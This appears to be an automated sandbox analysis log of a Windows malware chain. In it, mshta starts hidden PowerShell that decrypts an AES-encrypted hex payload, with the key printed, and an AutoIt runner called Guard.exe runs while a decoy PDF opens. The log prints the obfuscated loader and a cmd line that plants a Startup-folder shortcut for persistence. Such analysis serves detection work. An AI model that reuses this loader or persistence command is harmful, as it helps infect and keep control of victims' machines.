clean('85EF51FEE837F812F61F1656D38BD83A6C01DC072CBCF246D841948987B9BF3C9407C4F8ABE6B3AC5C50C036D5BF68E3CA56C456FB1B2404AC5CC6C48224E43EFF1648E7AF29CE17BF2F62A8A7C7F4DE07613F737B271AA100A67B779C122AD966C15CB3C823908B36BCCBE9B592D037365125E56312B004E07F513AA459ACF6BFEB51AC31152191AF94E56667A3D2A99C72466ED1996C430D4FDBDAAC444A645133FFD6F506740CE6AE51237562A4307EAF56A5E569B87DC171D550AD8A419C8822B7E0E8357121B4EE75DD16DB89B145D82B1C909ABECFAF2CA7275A13D2BF9E37AD98257B106D88D6988DB290C39C801B5ACD6E2249F2E178FCF16B59452E1DF6068D3A31595646428A980314EE83988BEB6E930DAD4F3640861D45D0A054E18C6A6A1DC88EC8B63FC99EA26D553E7BB5359CA978A904B26D285DA2E961D2C21E99F57B1C7F312913323B86FA89527AF31A5917C2DA9F587D7AD9CE91B6BF628678DF96FAE7AC81A58B57440B8A9E5A64E9BA96EB65240C98299F091495E74DF32B68B79275E2937AB69BF3BD5F0EC1E9A16BF58DA85A870C384779CDAD74B0CCBA5DB9AC7C88E57A05E5FB4B20E10C6C366F1EB3C39148D6FD619830E132F469D25D555A553DD869B43849F23E017958E14F9380CFE36FC613F285B96CA940C562F0BBE8C241411E58D012E23CE1C600E9337A739DB5AE1933D65A4E4AF946B7B1F6CF268BD58702C1B7772610043D981C68C31564F5D9BCBC8CD96ECCFFEEA53D365D01D36E4B3484C95363DD6F39138A67AA362CC9C4190026ABF641C6DF0E5D4A3DE01E05606278D5D2CD0D85DC89F086FAFB7491F9C40F89ED33F7D31C9484F5A8801EF1BABD7938BE509E2133642C8F35CA6BC2E09BEBD5D6E25F0DC30937B429ECB2F268B5D43052547BFA5B9ED413A38A20627D472EFB0F8E5508505831BA8934BFEEB8AE9A4BF2628245B5EC010BF6D308960A15DD28CFFB2D4FDABA50ADBE760CF86DACFCC1CC10A16D02B0C2946FCEDF74A822836F4B0F4975FF46B0CBA3CB495C20FC2E2D372C357A0897500BE09B0F824AA768EAFC28D39243CF341DE1E2A07E5CBD4B0252080E82D760C61806F6F7994A7DE1DCAB9D55F435A87A935C06EC1E878265F121BBA0C1C3B138C1C358E3620FE1A9D778846E6E0CC25C2E6EF13359D6033DE5B1EE13790F98BE7CD35C3B754897DB4583B2B846BCD4E1906C8F2416336E8F269DA57FC2A9824FD6457D1FBC840D50A0EBE6EA5D36FCDCAEB24318E174CC5E33792642277DCC1EBD38F0C1E9233BA2B6E85C963CD7EA29A78A0D2F2F3C1C85EEA9CB646881CEB314F342ECD05D23D5A754721D804D2562F5FDA471331489B61431D4EB09A03B9EF4D7FB5B3E8091B05427A6364A5B6D0281A41D08DF8F77CE3D19BBEDA721A10EB0619CC5BD0A356D2E124CD2962CE26B9E426500BC09F540E75EBD01524B2439910F6000364849B4B849A10268817BBDBE676C5F3DC1D39FA1F1A09760E6B0902B7C52C8F09DE7BF7015A029559284A573439130DC0912C8C12F8AFD9D26F921AF247BD1AFFBD37E1985F8D2709B4CE2681126C3BE8125DB7B0AB4C0CF4566221DEE6A82BC22EC143820A60C9066D3FDD32C6A78427A2E86463B2B6FFB7F128E906DB4659BDD9607349255B9A7F5362978B75C4A3D8234B1A87F09B3550450D25B8CC317C18849409DC37399F4E365EF0404E3CFE1AB8DBD8A85A9FF698337D674B0E24EFFA058A278F5943622');$MuOQabMc = [System.Security.Cryptography.Aes]::Create();$MuOQabMc.Key = clean('756561544973656A645A7544464B6A70');$MuOQabMc.IV = New-Object byte[] 16;$LaiuJGbhf = $MuOQabMc.CreateDecryptor();$mGnVsuDWp = [Text.Encoding]::UTF8.GetString($LaiuJGbhf.TransformFinalBlockJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Marketing.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function clean ($rptyb){return -split ($rptyb -replace '..', '0x$& ')};$tmdjyn = clean('85ef51fee837f812f61f1656d38bd83a6c01dc072cbcf246d841948987b9bf3c9407c4f8abe6b3ac5c50c036d5bf68e3ca56c456fb1b2404ac5cc6c48224e43eff1648e7af29ce17bf2f62a8a7c7f4de07613f737b271aa100a67b779c122ad966c15cb3c823908b36bccbe9b592d037365125e56312b004e07f513aa459acf6bfeb51ac31152191af94e56667a3d2a99c72466ed1996c430d4fdbdaac444a645133ffd6f506740ce6ae51237562a4307eaf56a5e569b87dc171d550ad8a419c8822b7e0e8357121b4ee75dd16db89b145d82b1c909abecfaf2ca7275a13d2bf9e37ad98257b106d88d6988db290c39c801b5acd6e2249f2e178fcf16b59452e1df6068d3a31595646428a980314ee83988beb6e930dad4f3640861d45d0a054e18c6a6a1dc88ec8b63fc99ea26d553e7bb5359ca978a904b26d285da2e961d2c21e99f57b1c7f312913323b86fa89527af31a5917c2da9f587d7ad9ce91b6bf628678df96fae7ac81a58b57440b8a9e5a64e9ba96eb65240c98299f091495e74df32b68b79275e2937ab69bf3bd5f0ec1e9a16bf58da85a870c384779cdad74b0ccba5db9ac7c88e57a05e5fb4b20e10c6c366f1eb3c39148d6fd619830e132f469d25d555a553dd869b43849f23e017958e14f9380cfe36fc613f285b96ca940c562f0bbe8c241411e58d012e23ce1c600e9337a739db5ae1933d65a4e4af946b7b1f6cf268bd58702c1b7772610043d981c68c31564f5d9bcbc8cd96eccffeea53d365d01d36e4b3484c95363dd6f39138a67aa362cc9c4190026abf641c6df0e5d4a3de01e05606278d5d2cd0d85dc89f086fafb7491f9c40f89ed33f7d31c9484f5a8801ef1babd7938be509e2133642c8f35ca6bc2e09bebd5d6e25f0dc30937b429ecb2f268b5d43052547bfa5b9ed413a38a20627d472efb0f8e5508505831ba8934bfeeb8ae9a4bf2628245b5ec010bf6d308960a15dd28cffb2d4fdaba50adbe760cf86dacfcc1cc10a16d02b0c2946fcedf74a822836f4b0f4975ff46b0cba3cb495c20fc2e2d372c357a0897500be09b0f824aa768eafc28d39243cf341de1e2a07e5cbd4b0252080e82d760c61806f6f7994a7de1dcab9d55f435a87a935c06ec1e878265f121bba0c1c3b138c1c358e3620fe1a9d778846e6e0cc25c2e6ef13359d6033de5b1ee13790f98be7cd35c3b754897db4583b2b846bcd4e1906c8f2416336e8f269da57fc2a9824fd6457d1fbc840d50a0ebe6ea5d36fcdcaeb24318e174cc5e33792642277dcc1ebd38f0c1e9233ba2b6e85c963cd7ea29a78a0d2f2f3c1c85eea9cb646881ceb314f342ecd05d23d5a754721d804d2562f5fda471331489b61431d4eb09a03b9ef4d7fb5b3e8091b05427a6364a5b6d0281a41d08df8f77ce3d19bbeda721a10eb0619cc5bd0a356d2e124cd2962ce26b9e426500bc09f540e75ebd01524b2439910f6000364849b4b849a10268817bbdbe676c5f3dc1d39fa1f1a09760e6b0902b7c52c8f09de7bf7015a029559284a573439130dc0912c8c12f8afd9d26f921af247bd1affbd37e1985f8d2709b4ce2681126c3be8125db7b0ab4c0cf4566221dee6a82bc22ec143820a60c9066d3fdd32c6a78427a2e86463b2b6ffb7f128e906db4659bdd9607349255b9a7f5362978b75c4a3d8234b1a87f09b3550450d25b8cc317c18849409dc37399f4e365ef0404e3cfe1ab8dbd8a85a9ff698337d674b0e24effa058a278f5943622');$muoqabmc = [system.security.cryptography.aes]::create();$muoqabmc.key = clean('756561544973656a645a7544464b6a70');$muoqabmc.iv = new-object byte[] 16;$laiujgbhf = $muoqabmc.createdecryptor();$mgnvsudwp = [text.encoding]::utf8.getstring($laiujgbhf.transformfinalblock
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function clean ($rptyb){return -split ($rptyb -replace '..', '0x$& ')};$tmdjyn = clean('85ef51fee837f812f61f1656d38bd83a6c01dc072cbcf246d841948987b9bf3c9407c4f8abe6b3ac5c50c036d5bf68e3ca56c456fb1b2404ac5cc6c48224e43eff1648e7af29ce17bf2f62a8a7c7f4de07613f737b271aa100a67b779c122ad966c15cb3c823908b36bccbe9b592d037365125e56312b004e07f513aa459acf6bfeb51ac31152191af94e56667a3d2a99c72466ed1996c430d4fdbdaac444a645133ffd6f506740ce6ae51237562a4307eaf56a5e569b87dc171d550ad8a419c8822b7e0e8357121b4ee75dd16db89b145d82b1c909abecfaf2ca7275a13d2bf9e37ad98257b106d88d6988db290c39c801b5acd6e2249f2e178fcf16b59452e1df6068d3a31595646428a980314ee83988beb6e930dad4f3640861d45d0a054e18c6a6a1dc88ec8b63fc99ea26d553e7bb5359ca978a904b26d285da2e961d2c21e99f57b1c7f312913323b86fa89527af31a5917c2da9f587d7ad9ce91b6bf628678df96fae7ac81a58b57440b8a9e5a64e9ba96eb65240c98299f091495e74df32b68b79275e2937ab69bf3bd5f0ec1e9a16bf58da85a870c384779cdad74b0ccba5db9ac7c88e57a05e5fb4b20e10c6c366f1eb3c39148d6fd619830e132f469d25d555a553dd869b43849f23e017958e14f9380cfe36fc613f285b96ca940c562f0bbe8c241411e58d012e23ce1c600e9337a739db5ae1933d65a4e4af946b7b1f6cf268bd58702c1b7772610043d981c68c31564f5d9bcbc8cd96eccffeea53d365d01d36e4b3484c95363dd6f39138a67aa362cc9c4190026abf641c6df0e5d4a3de01e05606278d5d2cd0d85dc89f086fafb7491f9c40f89ed33f7d31c9484f5a8801ef1babd7938be509e2133642c8f35ca6bc2e09bebd5d6e25f0dc30937b429ecb2f268b5d43052547bfa5b9ed413a38a20627d472efb0f8e5508505831ba8934bfeeb8ae9a4bf2628245b5ec010bf6d308960a15dd28cffb2d4fdaba50adbe760cf86dacfcc1cc10a16d02b0c2946fcedf74a822836f4b0f4975ff46b0cba3cb495c20fc2e2d372c357a0897500be09b0f824aa768eafc28d39243cf341de1e2a07e5cbd4b0252080e82d760c61806f6f7994a7de1dcab9d55f435a87a935c06ec1e878265f121bba0c1c3b138c1c358e3620fe1a9d778846e6e0cc25c2e6ef13359d6033de5b1ee13790f98be7cd35c3b754897db4583b2b846bcd4e1906c8f2416336e8f269da57fc2a9824fd6457d1fbc840d50a0ebe6ea5d36fcdcaeb24318e174cc5e33792642277dcc1ebd38f0c1e9233ba2b6e85c963cd7ea29a78a0d2f2f3c1c85eea9cb646881ceb314f342ecd05d23d5a754721d804d2562f5fda471331489b61431d4eb09a03b9ef4d7fb5b3e8091b05427a6364a5b6d0281a41d08df8f77ce3d19bbeda721a10eb0619cc5bd0a356d2e124cd2962ce26b9e426500bc09f540e75ebd01524b2439910f6000364849b4b849a10268817bbdbe676c5f3dc1d39fa1f1a09760e6b0902b7c52c8f09de7bf7015a029559284a573439130dc0912c8c12f8afd9d26f921af247bd1affbd37e1985f8d2709b4ce2681126c3be8125db7b0ab4c0cf4566221dee6a82bc22ec143820a60c9066d3fdd32c6a78427a2e86463b2b6ffb7f128e906db4659bdd9607349255b9a7f5362978b75c4a3d8234b1a87f09b3550450d25b8cc317c18849409dc37399f4e365ef0404e3cfe1ab8dbd8a85a9ff698337d674b0e24effa058a278f5943622');$muoqabmc = [system.security.cryptography.aes]::create();$muoqabmc.key = clean('756561544973656a645a7544464b6a70');$muoqabmc.iv = new-object byte[] 16;$laiujgbhf = $muoqabmc.createdecryptor();$mgnvsudwp = [text.encoding]::utf8.getstring($laiujgbhf.transformfinalblockJump to behavior
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EBC5FC GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00007FF7C0EBC5FC
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EBD540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00007FF7C0EBD540
Source: powershell.exe, 00000006.00000002.2202478685.00000270161B0000.00000004.00000800.00020000.00000000.sdmp, PefjSkkhb.exe, 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp, Guard.exe, 00000014.00000003.2314578379.00000000044BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: PefjSkkhb.exe, Guard.exe, SwiftWrite.pifBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E8FD20 cpuid 11_2_00007FF7C0E8FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED8BF4 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,wcscat,wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,wcscpy,11_2_00007FF7C0ED8BF4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EB2BCF GetUserNameW,11_2_00007FF7C0EB2BCF
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E92400 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_00007FF7C0E92400
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E71D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,11_2_00007FF7C0E71D80
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: powershell.exe, 00000012.00000002.2304075109.00000130E1738000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Users\Public\Guard.exe
Source: Guard.exe, 00000014.00000002.3290625854.0000000000BD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume3\Users\Public\Guard.exe
Source: powershell.exe, 00000012.00000002.2304075109.00000130E1738000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Public\Guard.exe
Source: powershell.exe, 00000012.00000002.2493771492.00000130F99BC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2493519711.00000130F98A4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2493771492.00000130F99B0000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.2311307135.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.2307187837.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.2311555077.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.2299267768.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.2299116100.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.2315878838.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.2311423461.0000000000630000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.2303450017.0000000000630000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Guard.exe
Source: powershell.exe, 00000012.00000002.2299983775.00000130DF737000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2C:\Users\Public\Guard.exe
Source: PefjSkkhb.exe, 0000000B.00000002.2238572807.000001A112952000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2299983775.00000130DF737000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E1558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2493771492.00000130F9A2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2488483129.00000130F9855000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E1738000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2493771492.00000130F99BC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2493771492.00000130F9A12000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, Guard.exe, 00000014.00000002.3290411307.0000000000B4F000.00000004.00000010.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3290411307.0000000000B5F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: C:\Users\Public\Guard.exe
Source: PefjSkkhb.exe, 0000000B.00000003.2234945531.000001A112961000.00000004.00000020.00020000.00000000.sdmp, PefjSkkhb.exe, 0000000B.00000003.2234826761.000001A112959000.00000004.00000020.00020000.00000000.sdmp, PefjSkkhb.exe, 0000000B.00000002.2238682876.000001A112962000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Public\Guard.exe
Source: powershell.exe, 00000012.00000002.2304075109.00000130E1738000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \Users\Public\Guard.exe
Source: SwiftWrite.pifBinary or memory string: WIN_81
Source: SwiftWrite.pifBinary or memory string: WIN_XP
Source: SwiftWrite.pifBinary or memory string: WIN_XPe
Source: SwiftWrite.pifBinary or memory string: WIN_VISTA
